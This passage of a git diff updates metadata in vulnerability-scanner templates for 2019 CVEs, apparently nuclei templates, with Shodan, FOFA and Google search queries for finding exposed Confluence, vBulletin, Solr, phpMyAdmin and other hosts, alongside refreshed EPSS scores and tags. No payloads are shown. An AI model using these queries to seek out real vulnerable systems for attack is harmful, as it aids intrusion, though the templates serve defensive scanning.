b/http/cves/2019/CVE-2019-12988.yaml index cfaeb96576..593e3a6d14 100644 --- a/http/cves/2019/CVE-2019-12988.yaml +++ b/http/cves/2019/CVE-2019-12988.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: citrix product: netscaler_sd-wan - shodan-query: http.title:"Citrix SD-WAN" + shodan-query: + - http.title:"Citrix SD-WAN" + - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" tags: cve,cve2019,rce,unauth,oast,tenable,citrix diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml index 4029b91e8c..1daca6e287 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml @@ -27,7 +27,9 @@ info: max-request: 3 vendor: citrix product: netscaler_sd-wan - shodan-query: http.title:"Citrix SD-WAN" + shodan-query: + - http.title:"Citrix SD-WAN" + - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" tags: cve,cve2019,citrix,rce,unauth,tenable,intrusive diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml index 2ba58eff87..dd8f87ea9e 100644 --- a/http/cves/2019/CVE-2019-14322.yaml +++ b/http/cves/2019/CVE-2019-14322.yaml @@ -29,7 +29,7 @@ info: vendor: microsoft product: windows shodan-query: cpe:"cpe:2.3:o:microsoft:windows" - tags: cve,cve2019,lfi,odoo,packetstorm,palletsprojects + tags: cve,cve2019,lfi,odoo,packetstorm,palletsprojects,microsoft http: - method: GET diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml index d8b02704ea..0631024a83 100644 --- a/http/cves/2019/CVE-2019-14470.yaml +++ b/http/cves/2019/CVE-2019-14470.yaml @@ -20,15 +20,14 @@ info: cvss-score: 6.1 cve-id: CVE-2019-14470 cwe-id: CWE-79 - epss-score: 0.79707 - epss-percentile: 0.98209 + epss-score: 0.75122 + epss-percentile: 0.98153 cpe: cpe:2.3:a:instagram-php-api_project:instagram-php-api:-:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: instagram-php-api_project - product: instagram-php-api + max-request: 2 + vendor: "instagram-php-api_project" + product: "instagram-php-api" tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,packetstorm,instagram-php-api_project - flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index 75074e1d65..870be0ae90 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -29,8 +29,15 @@ info: max-request: 2 vendor: open-emr product: openemr - fofa-query: icon_hash=1971268439 - shodan-query: http.html:"openemr" + shodan-query: + - http.html:"openemr" + - http.title:"openemr" + - http.favicon.hash:1971268439 + fofa-query: + - icon_hash=1971268439 + - body="openemr" + - title="openemr" + - app="openemr" google-query: intitle:"openemr" tags: cve2019,cve,lfi,authenticated,edb,openemr,open-emr diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index 6a212be265..b9be2286f8 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -28,9 +28,18 @@ info: max-request: 4 vendor: osticket product: osticket - shodan-query: title:"osTicket" - fofa-query: title="osticket" - google-query: intitle:"osticket" + shodan-query: + - title:"osTicket" + - http.title:"osticket" + - http.html:"powered by osticket" + - http.title:"osticket installer" + fofa-query: + - title="osticket" + - body="powered by osticket" + - title="osticket installer" + google-query: + - intitle:"osticket" + - intitle:"osticket installer" tags: cve,cve2019,packetstorm,osticket,xss,intrusive variables: user_name: "{{to_lower(rand_text_alphanumeric(6))}}" diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml index 20802e8eb1..bb98ad1047 100644 --- a/http/cves/2019/CVE-2019-14974.yaml +++ b/http/cves/2019/CVE-2019-14974.yaml @@ -20,16 +20,22 @@ info: cvss-score: 6.1 cve-id: CVE-2019-14974 cwe-id: CWE-79 - epss-score: 0.00217 - epss-percentile: 0.5978 + epss-score: 0.00173 + epss-percentile: 0.54331 cpe: cpe:2.3:a:sugarcrm:sugarcrm:9.0.0:*:*:*:enterprise:*:*:* metadata: max-request: 1 vendor: sugarcrm product: sugarcrm - shodan-query: http.html:"sugarcrm inc. all rights reserved" - google-query: intitle:sugarcrm - fofa-query: body="sugarcrm inc. all rights reserved" + shodan-query: + - http.html:"sugarcrm inc. all rights reserved" + - http.title:sugarcrm + fofa-query: + - body="sugarcrm inc. all rights reserved" + - title=sugarcrm + google-query: + - intitle:sugarcrm + - intext:"sugarcrm inc. all rights reserved" tags: cve,cve2019,xss,sugarcrm,edb http: diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index b8c995b875..8c0db63399 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: grafana product: grafana - shodan-query: title:"Grafana" - fofa-query: title="grafana" + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + fofa-query: + - title="grafana" + - app="grafana" google-query: intitle:"grafana" tags: cve,cve2019,grafana,dos,intrusive variables: diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index 1bb0a0cf6b..d5d39fcf09 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: lsoft product: listserv - shodan-query: http.html:"LISTSERV" + shodan-query: + - http.html:"LISTSERV" + - http.html:"listserv" fofa-query: body="listserv" tags: cve2019,cve,xss,listserv,edb,lsoft diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index 2dcb929082..5df6421e67 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -29,7 +29,9 @@ info: max-request: 4 vendor: webmin product: webmin - shodan-query: title:"Webmin" + shodan-query: + - title:"Webmin" + - http.title:"webmin" fofa-query: title="webmin" google-query: intitle:"webmin" tags: cve,cve2019,webmin,rce diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index bbcbbd5be7..6527f72473 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -13,20 +13,22 @@ info: - https://wpscan.com/vulnerability/9267 - https://wordpress.org/plugins/my-calendar/#developers - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-15713 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.41137 + epss-percentile: 0.41606 cpe: cpe:2.3:a:my_calendar_project:my_calendar:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: my_calendar_project - product: my_calendar + max-request: 2 + vendor: "my_calendar_project" + product: "my_calendar" framework: wordpress - fofa-query: '"wordpress" && body="wp-content/plugins/my-calendar"' + fofa-query: "\"wordpress\" && body=\"wp-content/plugins/my-calendar\"" tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,my_calendar_project flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml index 95c326a79d..3483882569 100644 --- a/http/cves/2019/CVE-2019-15829.yaml +++ b/http/cves/2019/CVE-2019-15829.yaml @@ -27,9 +27,9 @@ info: vendor: greentreelabs product: gallery_photoblocks framework: wordpress - publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" shodan-query: http.html:/wp-content/plugins/photoblocks-grid-gallery/ fofa-query: body=/wp-content/plugins/photoblocks-grid-gallery/ + publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" tags: cve,cve2019,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan,greentreelabs http: diff --git a/http/cves/2019/CVE-2019-15859.yaml b/http/cves/2019/CVE-2019-15859.yaml index 74b64243f3..051ce8f6d5 100644 --- a/http/cves/2019/CVE-2019-15859.yaml +++ b/http/cves/2019/CVE-2019-15859.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-15859 cwe-id: CWE-200 epss-score: 0.12379 - epss-percentile: 0.94891 + epss-percentile: 0.95414 cpe: cpe:2.3:o:socomec:diris_a-40_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index 1e6139120e..edee61075c 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.91254 cpe: cpe:2.3:a:wpdownloadmanager:wordpress_download_manager:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: wpdownloadmanager - product: wordpress_download_manager + product: "wordpress_download_manager" framework: wordpress tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,wpdownloadmanager flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml index 3a947e6bf5..b7f549d5ca 100644 --- a/http/cves/2019/CVE-2019-16057.yaml +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: dlink product: dns-320_firmware - shodan-query: html:"ShareCenter" + shodan-query: + - html:"ShareCenter" + - http.html:"sharecenter" fofa-query: body="sharecenter" tags: cve,cve2019,lfi,rce,kev,sharecenter,dlink diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml index 112d15eae1..d4fd45771f 100644 --- a/http/cves/2019/CVE-2019-16332.yaml +++ b/http/cves/2019/CVE-2019-16332.yaml @@ -24,12 +24,11 @@ info: epss-percentile: 0.69049 cpe: cpe:2.3:a:api_bearer_auth_project:api_bearer_auth:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: api_bearer_auth_project - product: api_bearer_auth + max-request: 2 + vendor: "api_bearer_auth_project" + product: "api_bearer_auth" framework: wordpress tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,auth,api_bearer_auth_project - flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-16469.yaml b/http/cves/2019/CVE-2019-16469.yaml index 13a039637e..4773f776e6 100644 --- a/http/cves/2019/CVE-2019-16469.yaml +++ b/http/cves/2019/CVE-2019-16469.yaml @@ -19,18 +19,22 @@ info: cvss-score: 7.5 cve-id: CVE-2019-16469 cwe-id: CWE-917 - epss-score: 0.17165 - epss-percentile: 0.95967 + epss-score: 0.15463 + epss-percentile: 0.959 cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: adobe product: experience_manager - shodan-query: http.component:"Adobe Experience Manager" + shodan-query: + - http.component:"Adobe Experience Manager" + - http.component:"adobe experience manager" + - http.title:"aem sign in" + - cpe:"cpe:2.3:a:adobe:experience_manager" fofa-query: title="aem sign in" google-query: intitle:"aem sign in" - tags: cve,cve2019,aem,eli,csti + tags: cve,cve2019,aem,eli,csti,adobe variables: num1: "{{rand_int(800000, 999999)}}" num2: "{{rand_int(800000, 999999)}}" diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml index 29eff0c62b..ad6e6b78df 100644 --- a/http/cves/2019/CVE-2019-16525.yaml +++ b/http/cves/2019/CVE-2019-16525.yaml @@ -24,12 +24,11 @@ info: epss-percentile: 0.67586 cpe: cpe:2.3:a:checklist:checklist:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: checklist product: checklist framework: wordpress tags: cve,cve2019,xss,wp-plugin,packetstorm,wordpress,checklist - flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml index c433649c88..34d4997cf2 100644 --- a/http/cves/2019/CVE-2019-16759.yaml +++ b/http/cves/2019/CVE-2019-16759.yaml @@ -20,17 +20,26 @@ info: cvss-score: 9.8 cve-id: CVE-2019-16759 cwe-id: CWE-94 - epss-score: 0.97532 - epss-percentile: 0.99992 + epss-score: 0.97513 + epss-percentile: 0.99985 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: vbulletin product: vbulletin - shodan-query: http.component:"vBulletin" - google-query: intext:"powered by vbulletin" - fofa-query: body="powered by vbulletin" + shodan-query: + - http.component:"vBulletin" + - http.html:"powered by vbulletin" + - http.component:"vbulletin" + - http.title:"powered by vbulletin" + - cpe:"cpe:2.3:a:vbulletin:vbulletin" + fofa-query: + - body="powered by vbulletin" + - title="powered by vbulletin" + google-query: + - intext:"powered by vbulletin" + - intitle:"powered by vbulletin" tags: cve,cve2019,rce,kev,seclists,vbulletin http: diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml index 69ca3778cf..38bae35df0 100644 --- a/http/cves/2019/CVE-2019-16932.yaml +++ b/http/cves/2019/CVE-2019-16932.yaml @@ -21,16 +21,15 @@ info: cvss-score: 10 cve-id: CVE-2019-16932 cwe-id: CWE-918 - epss-score: 0.53434 - epss-percentile: 0.97316 + epss-score: 0.37504 + epss-percentile: 0.97194 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: themeisle product: visualizer framework: wordpress - tags: cve,cve2019,wp-plugin,ssrf,wordpress,oast,unauth,wpscan,intrusive,themeisle - + tags: cve,cve2019,wp-plugin,ssrf,wordpress,oast,unauth,wpscan,intrusive,themeisle,xss flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index c04c68ea1d..07629a5020 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -20,15 +20,21 @@ info: cvss-score: 9.1 cve-id: CVE-2019-17382 cwe-id: CWE-639 - epss-score: 0.3141 - epss-percentile: 0.96581 + epss-score: 0.3552 + epss-percentile: 0.97136 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 100 vendor: zabbix product: zabbix - shodan-query: http.favicon.hash:892542951 - fofa-query: icon_hash=892542951 + shodan-query: + - http.favicon.hash:892542951 + - http.title:"zabbix-server" + - cpe:"cpe:2.3:a:zabbix:zabbix" + fofa-query: + - icon_hash=892542951 + - app="zabbix-监控系统" && body="saml" + - title="zabbix-server" google-query: intitle:"zabbix-server" tags: cve2019,cve,fuzz,auth-bypass,login,edb,zabbix diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index 89f7376ac7..f8fd6d484d 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -27,9 +27,16 @@ info: max-request: 3 vendor: apache product: solr - shodan-query: cpe:"cpe:2.3:a:apache:solr" - fofa-query: title="solr admin" - google-query: intitle:"apache solr" + shodan-query: + - cpe:"cpe:2.3:a:apache:solr" + - http.title:"apache solr" + - http.title:"solr admin" + fofa-query: + - title="solr admin" + - title="apache solr" + google-query: + - intitle:"apache solr" + - intitle:"solr admin" tags: cve,cve2019,kev,packetstorm,apache,rce,solr,oast http: diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index 128ff22994..eee644def1 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml @@ -30,9 +30,9 @@ info: vendor: code-atlantic product: popup_maker framework: wordpress - publicwww-query: "/wp-content/plugins/popup-maker/" shodan-query: http.html:/wp-content/plugins/popup-maker/ fofa-query: body=/wp-content/plugins/popup-maker/ + publicwww-query: "/wp-content/plugins/popup-maker/" tags: cve,cve2019,wpscan,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic http: diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml index 8dfa30b3db..ab9d56a0a1 100644 --- a/http/cves/2019/CVE-2019-18393.yaml +++ b/http/cves/2019/CVE-2019-18393.yaml @@ -27,9 +27,15 @@ info: max-request: 1 vendor: igniterealtime product: openfire - shodan-query: http.title:"openfire admin console" - fofa-query: title="openfire" - google-query: intitle:"openfire" + shodan-query: + - http.title:"openfire admin console" + - http.title:"openfire" + fofa-query: + - title="openfire" + - title="openfire admin console" + google-query: + - intitle:"openfire" + - intitle:"openfire admin console" tags: cve,cve2019,openfire,lfi,igniterealtime http: diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index abef22e9e1..4bd6b023ff 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -27,9 +27,15 @@ info: max-request: 1 vendor: igniterealtime product: openfire - shodan-query: http.title:"openfire admin console" - fofa-query: title="openfire" - google-query: intitle:"openfire" + shodan-query: + - http.title:"openfire admin console" + - http.title:"openfire" + fofa-query: + - title="openfire" + - title="openfire admin console" + google-query: + - intitle:"openfire" + - intitle:"openfire admin console" tags: cve,cve2019,ssrf,openfire,oast,igniterealtime http: diff --git a/http/cves/2019/CVE-2019-18922.yaml b/http/cves/2019/CVE-2019-18922.yaml index fd5a84290e..d731ab0b7b 100644 --- a/http/cves/2019/CVE-2019-18922.yaml +++ b/http/cves/2019/CVE-2019-18922.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-18922 cwe-id: CWE-22 - epss-score: 0.2399 - epss-percentile: 0.96487 + epss-score: 0.14866 + epss-percentile: 0.95795 cpe: cpe:2.3:o:alliedtelesis:at-gs950\/8_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml index 78059e4bdb..1a608fb539 100644 --- a/http/cves/2019/CVE-2019-1898.yaml +++ b/http/cves/2019/CVE-2019-1898.yaml @@ -19,16 +19,16 @@ info: cvss-score: 5.3 cve-id: CVE-2019-1898 cwe-id: CWE-425,CWE-285 - epss-score: 0.07254 - epss-percentile: 0.93384 + epss-score: 0.06856 + epss-percentile: 0.93891 cpe: cpe:2.3:o:cisco:rv110w_firmware:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cisco product: rv110w_firmware - fofa-query: icon_hash="-646322113" shodan-query: http.favicon.hash:"-646322113" + fofa-query: icon_hash="-646322113" tags: cve,cve2019,cisco,router,iot http: diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml index 6c535dbfef..50c8b7f132 100644 --- a/http/cves/2019/CVE-2019-19134.yaml +++ b/http/cves/2019/CVE-2019-19134.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-19134 cwe-id: CWE-79 epss-score: 0.00203 - epss-percentile: 0.58236 + epss-percentile: 0.58276 cpe: cpe:2.3:a:heroplugins:hero_maps_premium:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml index 66ae291223..74f2612a12 100644 --- a/http/cves/2019/CVE-2019-1943.yaml +++ b/http/cves/2019/CVE-2019-1943.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-1943 cwe-id: CWE-601 - epss-score: 0.03526 - epss-percentile: 0.90666 + epss-score: 0.05334 + epss-percentile: 0.93073 cpe: cpe:2.3:o:cisco:sg200-50_firmware:-:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index 530bd00d0f..7c3e954721 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2019-20183 cwe-id: CWE-434 - epss-score: 0.02447 - epss-percentile: 0.89763 + epss-score: 0.03815 + epss-percentile: 0.91874 cpe: cpe:2.3:a:employee_records_system_project:employee_records_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index 6e29270446..474ed704f2 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -19,15 +19,18 @@ info: cvss-score: 9.8 cve-id: CVE-2019-20933 cwe-id: CWE-287 - epss-score: 0.04913 - epss-percentile: 0.92609 + epss-score: 0.04237 + epss-percentile: 0.92253 cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: influxdata product: influxdb - shodan-query: InfluxDB + shodan-query: + - InfluxDB + - http.title:"influxdb - admin interface" + - influxdb fofa-query: title="influxdb - admin interface" google-query: intitle:"influxdb - admin interface" tags: cve,cve2019,unauth,db,influxdb,misconfig,influxdata diff --git a/http/cves/2019/CVE-2019-2767.yaml b/http/cves/2019/CVE-2019-2767.yaml index e39c7215bc..fb8dd8f32b 100644 --- a/http/cves/2019/CVE-2019-2767.yaml +++ b/http/cves/2019/CVE-2019-2767.yaml @@ -20,7 +20,7 @@ info: cvss-score: 7.2 cve-id: CVE-2019-2767 epss-score: 0.14972 - epss-percentile: 0.95676 + epss-percentile: 0.95807 cpe: cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3396.yaml b/http/cves/2019/CVE-2019-3396.yaml index 82e7bacddb..ee304d0792 100644 --- a/http/cves/2019/CVE-2019-3396.yaml +++ b/http/cves/2019/CVE-2019-3396.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: atlassian product: confluence - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - cpe:"cpe:2.3:a:atlassian:confluence" + - http.component:"atlassian confluence" tags: cve,cve2019,atlassian,confluence,lfi,rce,kev,packetstorm http: diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml index 474163baa2..80149deac7 100644 --- a/http/cves/2019/CVE-2019-3398.yaml +++ b/http/cves/2019/CVE-2019-3398.yaml @@ -21,14 +21,16 @@ info: cvss-score: 8.8 cve-id: CVE-2019-3398 cwe-id: CWE-22 - epss-score: 0.97145 - epss-percentile: 0.99783 + epss-score: 0.97045 + epss-percentile: 0.99757 cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: atlassian product: confluence - shodan-query: http.component:"atlassian confluence" + shodan-query: + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:confluence" tags: cve,cve2019,packetstorm,atlassian,confluence,rce,authenticated,intrusive,kev variables: num1: "{{rand_int(800000, 999999)}}" diff --git a/http/cves/2019/CVE-2019-3401.yaml b/http/cves/2019/CVE-2019-3401.yaml index ef32e75c7c..35aabc1efa 100644 --- a/http/cves/2019/CVE-2019-3401.yaml +++ b/http/cves/2019/CVE-2019-3401.yaml @@ -23,7 +23,11 @@ info: max-request: 1 vendor: atlassian product: jira - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: cve,cve2019,jira,atlassian,exposure http: diff --git a/http/cves/2019/CVE-2019-3402.yaml b/http/cves/2019/CVE-2019-3402.yaml index dcd33c1502..3001a2760c 100644 --- a/http/cves/2019/CVE-2019-3402.yaml +++ b/http/cves/2019/CVE-2019-3402.yaml @@ -29,7 +29,11 @@ info: max-request: 1 vendor: atlassian product: jira - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: cve,cve2019,atlassian,jira,xss http: diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml index d344db99a1..b551f6d9c6 100644 --- a/http/cves/2019/CVE-2019-3403.yaml +++ b/http/cves/2019/CVE-2019-3403.yaml @@ -27,7 +27,11 @@ info: max-request: 1 vendor: atlassian product: jira - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: cve,cve2019,atlassian,jira,enumeration http: diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index 3dc28e9443..442c28b963 100644 --- a/http/cves/2019/CVE-2019-3911.yaml +++ b/http/cves/2019/CVE-2019-3911.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: labkey product: labkey_server - shodan-query: 'Server: Labkey' + shodan-query: + - 'Server: Labkey' + - 'http.title:"sign in: /home"' + - "server: labkey" fofa-query: 'title="sign in: /home"' google-query: 'intitle:"sign in: /home"' tags: cve,cve2019,xss,labkey,tenable diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index 6e948b58a5..6c770339e0 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: labkey product: labkey_server - shodan-query: 'Server: Labkey' + shodan-query: + - 'Server: Labkey' + - 'http.title:"sign in: /home"' + - "server: labkey" fofa-query: 'title="sign in: /home"' google-query: 'intitle:"sign in: /home"' tags: cve2019,cve,tenable,redirect,labkey diff --git a/http/cves/2019/CVE-2019-5418.yaml b/http/cves/2019/CVE-2019-5418.yaml index fab810610f..5fc44e83a9 100644 --- a/http/cves/2019/CVE-2019-5418.yaml +++ b/http/cves/2019/CVE-2019-5418.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-5418 cwe-id: CWE-22,NVD-CWE-noinfo - epss-score: 0.97434 - epss-percentile: 0.99939 + epss-score: 0.97426 + epss-percentile: 0.99937 cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml index 07618f185d..7eaa95e1aa 100644 --- a/http/cves/2019/CVE-2019-5434.yaml +++ b/http/cves/2019/CVE-2019-5434.yaml @@ -29,8 +29,12 @@ info: max-request: 2 vendor: revive-sas product: revive_adserver - shodan-query: http.favicon.hash:106844876 - fofa-query: icon_hash=106844876 + shodan-query: + - http.favicon.hash:106844876 + - http.title:"revive adserver" + fofa-query: + - icon_hash=106844876 + - title="revive adserver" google-query: intitle:"revive adserver" tags: cve,cve2019,edb,packetstorm,revive,adserver,rce,revive-sas diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index a7cc02aafa..c03e7acff8 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: drupal product: drupal - shodan-query: http.component:"drupal" + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" tags: cve,cve2019,drupal,rce,kev http: diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml index bac3031a9f..2cde997c55 100644 --- a/http/cves/2019/CVE-2019-6799.yaml +++ b/http/cves/2019/CVE-2019-6799.yaml @@ -29,10 +29,18 @@ info: max-request: 6 vendor: phpmyadmin product: phpmyadmin - shodan-query: title:"phpmyadmin" - fofa-query: body="pma_servername" && body="4.8.4" - hunter-query: app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4" + shodan-query: + - title:"phpmyadmin" + - http.title:"phpmyadmin" + - http.component:"phpmyadmin" + - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin" + fofa-query: + - body="pma_servername" && body="4.8.4" + - title="phpmyadmin" google-query: intitle:"phpmyadmin" + hunter-query: + - app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4" + - app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive,sqli http: diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml index 3af501e32f..851e466b54 100644 --- a/http/cves/2019/CVE-2019-6802.yaml +++ b/http/cves/2019/CVE-2019-6802.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: python product: pypiserver - shodan-query: html:"pypiserver" + shodan-query: + - html:"pypiserver" + - http.html:"pypiserver" fofa-query: body="pypiserver" tags: cve,cve2019,crlf,pypiserver,python diff --git a/http/cves/2019/CVE-2019-7139.yaml b/http/cves/2019/CVE-2019-7139.yaml index bb8ecfc9e5..eb62ccb3f3 100644 --- a/http/cves/2019/CVE-2019-7139.yaml +++ 